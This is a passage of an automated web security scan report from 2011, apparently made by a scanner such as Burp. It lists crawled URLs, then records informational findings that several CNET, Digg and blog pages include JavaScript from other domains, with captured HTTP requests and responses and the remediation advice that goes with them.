http://download.cnet.com/8301-2007_4-20015771-12.html
http://download.cnet.com/8301-2007_4-20027809-12.html
http://download.cnet.com/8301-2007_4-20027809-12.html--
http://download.cnet.com/8301-2007_4-20027809-12.html/
http://download.cnet.com/8301-2007_4-20027865-12.html
http://download.cnet.com/8618-2007_4-20027809.html
http://download.cnet.com/download-blog/
http://download.cnet.com/mac/
http://download.cnet.com/mobile-downloads/
http://download.cnet.com/webware-apps/
http://download.cnet.com/windows/
http://flowplayer.org/tools/
http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/
http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/
http://landesm.gfi.com/event-log-analysis-sm/
http://www.addthis.com/bookmark.php
http://www.admob.com/
http://www.cbsinteractive.com/adfeedback/
http://www.connect.facebook.com/widgets/fan.php
http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml
http://www.pwc.com/en_GX/webadmin/forms/email_a_colleague.jhtml
http://www.pwc.com/gx/en/annual-review
http://www.pwc.com/gx/en/annual-review/facts-figures-2010.jhtml
http://www.pwc.com/gx/en/index.jhtml
http://www.pwc.com/us/en/10minutes/cloud-computing.jhtml
http://www.pwc.com/us/en/index.jhtml
http://www.pwc.com/us/en/industry/index.jhtml
http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml
http://www.pwc.com/us/en/issues/current-issues.jhtml
http://www.pwc.com/us/en/services/index.jhtml
http://www.pwc.com/us/en/technology/index.jhtml
http://www.tukaiz.com/index.php
http://www.tukui.org/v2/forums/
http://www.tukui.org/v2/forums/register.php
http://www.walmart.com/x22
http://www.websitedescription.com/msn.whitepages.com
http://www.wired.com/
http://www.wired.com/about/blogs
http://www.wired.com/about/faq/
http://www.wired.com/about/feedback/
http://www.wired.com/about/mobile/
http://www.wired.com/about/press/
http://www.wired.com/about/privacy-policy/
http://www.wired.com/about/rss_feeds/
http://www.wired.com/about/sitemap/
http://www.wired.com/about/staff_web/
http://www.wired.com/about/user-agreement/
http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A
http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices
http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header
http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout
http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar
http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover
http://www.wired.com/autopia/
http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/
http://www.wired.com/blogs/
http://www.wired.com/cars/
http://www.wired.com/culture/
http://www.wired.com/dangerroom/
http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/
http://www.wired.com/entertainment/
http://www.wired.com/epicenter/
http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/
http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/
http://www.wired.com/gadgetlab/
http://www.wired.com/gadgets/
http://www.wired.com/gamelife/
http://www.wired.com/gaming/
http://www.wired.com/geekdad/
http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/
http://www.wired.com/inspiredbyyou/
http://www.wired.com/js/global.js
http://www.wired.com/magazine/
http://www.wired.com/magazine/decode/
http://www.wired.com/magazine/ipad
http://www.wired.com/medtech/
http://www.wired.com/nolayout/rssproxy
http://www.wired.com/playbook/
http://www.wired.com/politics/
http://www.wired.com/rawfile/
http://www.wired.com/reviews/
http://www.wired.com/reviews/%20
http://www.wired.com/reviews/category/automotive/
http://www.wired.com/reviews/category/desktops-and-accessories/
http://www.wired.com/reviews/category/digital-cameras-and-camcorders/
http://www.wired.com/reviews/category/gaming-gear/
http://www.wired.com/reviews/category/home-audio-and-video/
http://www.wired.com/reviews/category/household/
http://www.wired.com/reviews/category/media-players/
http://www.wired.com/reviews/category/mobile-audio/
http://www.wired.com/reviews/category/mobile-phones/
http://www.wired.com/reviews/category/notebooks-and-accessories/
http://www.wired.com/reviews/category/roundups/
http://www.wired.com/reviews/category/software-and-apps/
http://www.wired.com/reviews/category/sports-and-outdoors/
http://www.wired.com/reviews/category/tablets-and-ebook-readers/
http://www.wired.com/reviews/category/televisions/
http://www.wired.com/science/
http://www.wired.com/search
http://www.wired.com/services/corrections/
http://www.wired.com/services/newsletters
http://www.wired.com/software/
http://www.wired.com/techbiz/
http://www.wired.com/thisdayintech/
http://www.wired.com/threatlevel/
http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/
http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/
http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/
http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/
http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/
http://www.wired.com/threatlevel/2011/01/codebreakers-death/
http://www.wired.com/threatlevel/2011/01/dubai-assassination/
http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/
http://www.wired.com/threatlevel/2011/01/vf-wikieaks/
http://www.wired.com/threatlevel/2011/01/video-poker/
http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ
http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure
http://www.wired.com/threatlevel/author/kimzetter/
http://www.wired.com/threatlevel/category/announcements/
http://www.wired.com/threatlevel/category/atm-hacking/
http://www.wired.com/threatlevel/category/bittorrent/
http://www.wired.com/threatlevel/category/black-hat-conference/
http://www.wired.com/threatlevel/category/bradley-manning/
http://www.wired.com/threatlevel/category/breaches/
http://www.wired.com/threatlevel/category/censorship/
http://www.wired.com/threatlevel/category/chaos-computer-club/
http://www.wired.com/threatlevel/category/conferences/
http://www.wired.com/threatlevel/category/copyrights-and-patents/
http://www.wired.com/threatlevel/category/coverups/
http://www.wired.com/threatlevel/category/crime/
http://www.wired.com/threatlevel/category/crypto/
http://www.wired.com/threatlevel/category/cybarmageddon/
http://www.wired.com/threatlevel/category/cyber-warfare/
http://www.wired.com/threatlevel/category/cyberbullying/
http://www.wired.com/threatlevel/category/cybersecurity/
http://www.wired.com/threatlevel/category/defcon/
http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/
http://www.wired.com/threatlevel/category/e-voting/
http://www.wired.com/threatlevel/category/elections/
http://www.wired.com/threatlevel/category/fed-blotter/
http://www.wired.com/threatlevel/category/glitches-and-bugs/
http://www.wired.com/threatlevel/category/hacks-and-cracks/
http://www.wired.com/threatlevel/category/hans-reiser-trial/
http://www.wired.com/threatlevel/category/identification/
http://www.wired.com/threatlevel/category/intellectual-property/
http://www.wired.com/threatlevel/category/lori-drew-trial/
http://www.wired.com/threatlevel/category/network-neutrality/
http://www.wired.com/threatlevel/category/nsa/
http://www.wired.com/threatlevel/category/openleaks/
http://www.wired.com/threatlevel/category/politics/
http://www.wired.com/threatlevel/category/porn/
http://www.wired.com/threatlevel/category/privacy/
http://www.wired.com/threatlevel/category/rfid/
http://www.wired.com/threatlevel/category/riaa-litigation/
http://www.wired.com/threatlevel/category/rsa-conference/
http://www.wired.com/threatlevel/category/sexting/
http://www.wired.com/threatlevel/category/spooks-gone-wild/
http://www.wired.com/threatlevel/category/stuxnet/
http://www.wired.com/threatlevel/category/sunshine-and-secrecy/
http://www.wired.com/threatlevel/category/surveillance/
http://www.wired.com/threatlevel/category/the-courts/
http://www.wired.com/threatlevel/category/the-ridiculous/
http://www.wired.com/threatlevel/category/threats/
http://www.wired.com/threatlevel/category/three-strikes/
http://www.wired.com/threatlevel/category/tsa/
http://www.wired.com/threatlevel/category/uncategorized/
http://www.wired.com/threatlevel/category/watchlists/
http://www.wired.com/threatlevel/category/wikileaks/
http://www.wired.com/threatlevel/category/yo-ho-ho/
http://www.wired.com/threatlevel/tag/4chan/
http://www.wired.com/threatlevel/tag/aclu/
http://www.wired.com/threatlevel/tag/al-haramain/
http://www.wired.com/threatlevel/tag/albert-gonzalez/
http://www.wired.com/threatlevel/tag/apple-iphone/
http://www.wired.com/threatlevel/tag/blackhat/
http://www.wired.com/threatlevel/tag/bradley-manning/
http://www.wired.com/threatlevel/tag/carding/
http://www.wired.com/threatlevel/tag/ccc/
http://www.wired.com/threatlevel/tag/censorship/
http://www.wired.com/threatlevel/tag/china/
http://www.wired.com/threatlevel/tag/copyright/
http://www.wired.com/threatlevel/tag/crime/
http://www.wired.com/threatlevel/tag/defcon/
http://www.wired.com/threatlevel/tag/dmca/
http://www.wired.com/threatlevel/tag/facebook/
http://www.wired.com/threatlevel/tag/fbi/
http://www.wired.com/threatlevel/tag/file-sharing/
http://www.wired.com/threatlevel/tag/first-amendment/
http://www.wired.com/threatlevel/tag/google/
http://www.wired.com/threatlevel/tag/hack/
http://www.wired.com/threatlevel/tag/hacking/
http://www.wired.com/threatlevel/tag/intellectual-property/
http://www.wired.com/threatlevel/tag/mpaa/
http://www.wired.com/threatlevel/tag/nsa/
http://www.wired.com/threatlevel/tag/obama/
http://www.wired.com/threatlevel/tag/piracy/
http://www.wired.com/threatlevel/tag/pirate-bay-trial/
http://www.wired.com/threatlevel/tag/pirate-bay/
http://www.wired.com/threatlevel/tag/politics/
http://www.wired.com/threatlevel/tag/privacy/
http://www.wired.com/threatlevel/tag/riaa/
http://www.wired.com/threatlevel/tag/segvec/
http://www.wired.com/threatlevel/tag/supreme-court/
http://www.wired.com/threatlevel/tag/surveillance/
http://www.wired.com/threatlevel/tag/tjx/
http://www.wired.com/threatlevel/tag/tsa/
http://www.wired.com/threatlevel/tag/twitter/
http://www.wired.com/threatlevel/tag/virginia-tech-shootings/
http://www.wired.com/threatlevel/tag/wikileaks/
http://www.wired.com/topics/Claude_Cassirer
http://www.wired.com/topics/Florida
http://www.wired.com/topics/Spain
http://www.wired.com/topics/United_States
http://www.wired.com/topics/Western_Europe
http://www.wired.com/topics/WikiLeaks.org
http://www.wired.com/underwire/
http://www.wired.com/video/
http://www.wired.com/video/search/
http://www.wired.com/wiredscience/
http://www.zdnet.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. http://dean.edwards.name/weblog/2006/03/base/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/03/base/

Issue detail

The response dynamically includes the following script from another domain:

http://deanedwardsoffline.appspot.com/js/my.js

Request

GET /weblog/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 12:59:44 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Wed, 12 Jan 2011 12:59:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 175763

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards">
<link rel="styleshe
...[SNIP]...
<link rel="icon" href="/favicon.ico" type="image/x-icon">
<script src="http://deanedwardsoffline.appspot.com/js/my.js"></script>
...[SNIP]...

16.2. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js
http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js
http://cdn4.diggstatic.com/js/lib.aa1e98d4.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn4.diggstatic.com/js/lib.aa1e98d4.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.3. http://download.cnet.com/1770-20_4-0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/1770-20_4-0.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.14?
http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.search.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/pers/pers.tron.search.feedback.compressed.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: nb
Expires: Wed, 12 Jan 2011 13:01:01 GMT
Edge-Control: max-age=300
Age: 313
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=300
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 39010

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title>Search -
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<meta name="keywords" content="Search, Search reviews, Search prices, Search video, Search news." /> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.search.compressed.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
leclick.net/adi/N5295.150723.CBSI/B5081823;sz=728x90;ord=2011.01.12.13.01.14?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.14?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=y8cXzwoOYJMAAH2r43gAAAJO&t=2011.01.12.13.01.14/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
<head>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/pers/pers.tron.search.feedback.compressed.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.4. http://download.cnet.com/3474-4_4-0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/3474-4_4-0.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78

Request

GET /3474-4_4-0.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:35:36 GMT
Content-Language: en
Expires: Wed, 12 Jan 2011 03:40:36 GMT
Edge-Control: max-age=300
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=300
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 19404

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title></title>
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.5. http://download.cnet.com/8301-2007_4-20015771-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20015771-12.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://d.yimg.com/ds/badge.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://platform.twitter.com/widgets.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:19 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:00:36 GMT
Edge-Control: max-age=360
Age: 404
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:19 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:24 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 76026

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head> <title>Trend Micro bets on the cloud | The Download Blog - Downl
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js"></script>
...[SNIP]...
</style> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js"></script>  <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
<li class="shareYbuzz"><script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">:http://download.cnet.com/8301-2007_4-20015771-12.html?tag=yahoobuzz</script>
...[SNIP]...
 <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.6. http://download.cnet.com/8301-2007_4-20027809-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://d.yimg.com/ds/badge.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://platform.twitter.com/widgets.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:47 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:40:47 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:34:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:34:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 69379

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head> <title>Android lands cloud security from Trend Micro | The Downl
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js"></script>
...[SNIP]...
</style> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js"></script>  <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
<li class="shareYbuzz"><script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">:http://download.cnet.com/8301-2007_4-20027809-12.html?tag=yahoobuzz</script>
...[SNIP]...
 <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.7. http://download.cnet.com/8301-2007_4-20027809-12.html-- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html--

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://d.yimg.com/ds/badge.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
